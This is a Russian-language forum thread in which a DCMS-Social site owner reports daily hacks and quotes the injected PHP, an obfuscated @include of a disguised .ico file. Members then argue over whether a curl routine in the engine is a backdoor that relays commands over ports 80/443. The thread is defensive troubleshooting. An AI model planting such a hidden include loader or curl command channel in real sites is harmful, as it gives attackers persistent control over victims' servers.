Взлом

3 Янв 2018
Поставил последнюю версию социала, взламывают каждый день, задолбался чистить индексы от кода.
двиг уязвим как я понял.

<?php
/*538c7*/
@include "x2fvx61rx2fwx77wx2fkx61vx6bax7aax72ux2fdx61tx61/x77wx77/x6bax76kx61zx61.x72ux2fsx74yx6cex2fax76tx6frx69tx65tx2ffx61vx69cx6fnx5f4x34ex37bx37.x69cx6f";
/*538c7*/
?>

Тема закрыта Zed
Последний раз редактировалось Zed 28 Фев 2018

Статистика WMID автора:

156531416076 BL

Претензии | Отзывы

Комментарии:

Cистема 28 Фев 2018
Тему переместил Админ форума Zed из раздела Разработчикам в раздел Архив закрытых тем

Cистема 28 Фев 2018
Тему закрыл Админ форума Zed

DoR 28 Фев 2018
kantry, Не знаю почему, это не плохо бы у самих людей спросить, наверное код лёгкий и понятный.
Сразу на чём заострил внимание?
На $data = curl_exec($ch); а именно стёк $data
В конструкции лишний, а всё лишнее, как в pdo гоним через плейсхолдеры
тобишь ставим под вопрос(шутка)
А остальное, может быть любое произвольное, это прмер...
Цель, показать передачу команд через порт 80 либо 443
С чем демо и справился(извиняюсь за код на коленке)
И если не нашёл $data, это не страшно.
Просто удали конструкцию(если пользуешь двиг)
А в корне, обеспокоил Скиталец(для Zed-A пока простительно)
Сидит на двиге 300 лет, и кроме выкриков я кодяр - я кодяр
так и не осилил smile

И это далеко не первый раз, где при разборе
даже не сложного кода, Скиталец проявляет себя
обычным копипастером и тролем.
Нет, ну оно понятно. Ему то сказать хочется, а сказть не чего smile

Вот он и заводит одну и туже пластинку - постоянно одну.
Почитай ту тему, Stavr заранее знал что Скиталец отчебучит smile

kantry 27 Фев 2018
DoR, но не до такой же степени? Причем тут этот код, и создание шелл в include.php? Если ты умудрился залить левый файл на сервер, на кой вообще вся возня с курлами и т п? А уж если разработчик сознательно оставил бэкдор так это уже на его совести, не знаю тогда почему все кому не лень напяливают себе социалы на хостинге.
П.С. От нечего делать просмотрел последний социал, нет там больше нигде $data.

DoR 27 Фев 2018
kantry, Иногда лучше быть параноиком чем круглым дыбилом smile

Мы не будем не у кого не чего спрашивать, прикинь...
Специально для тебя сделал, ну хоть с этим то разберёшься.
С готовым примером, ага? smile

Добавлено:
Angelok0803, Привет. Не слушай их
Вот пример, там всё прокомано и в примерах сможешь сам воспроизвести.
Верь глазам своим, они не обманут.
А это всё что они пишут, они уже много лет что то да пишут.
Только у социала от их писанины, дыр меньше не стало.
Да ты и сам это знаешь.
zip

demo (3.8Kb)
Рейтинг: 0/0 | Скачано: 136 раз(а)
zip

demo (3.8Kb)
Рейтинг: 0/0 | Скачано: 68 раз(а)

kantry 27 Фев 2018

Скиталец (26 Фев 2018):
DoR, ради бога поясни мне убогому двоешнику что же такого уязвимого в этом коде? Я лично ничего опсного там невижу... Может ты все таки бургамистр?
Добавлено:
Angelok0803, да не слушай ты его,
это обычная инициализация сеанса curl ничего уязвимого там нет, даже написано верно, все подчистили после выполнения.

DoR, мне тоже интересно, откуда эта паранойя?:-D
Спроси заодно у хозянина dcms-social.ru что у него в файле cron.php(там кроме счетчика ничего быть не может), и передать на другой сайт он кроме html ничего не может.

Svat 27 Фев 2018
DoR, Молодец. Я уже понял ход твоей мысли, всё верно.
Но... Обратил бы внимание что это происходит над файлом
/sys/inc/user.php где обычно лепят всякие защиты, анти-шеллы.
Проще, всё происходит поверх защиты.
Теперь со Скитальцем ясность.
Я то думал что он просто заблуждается.
А оно Эвоно как, печалька.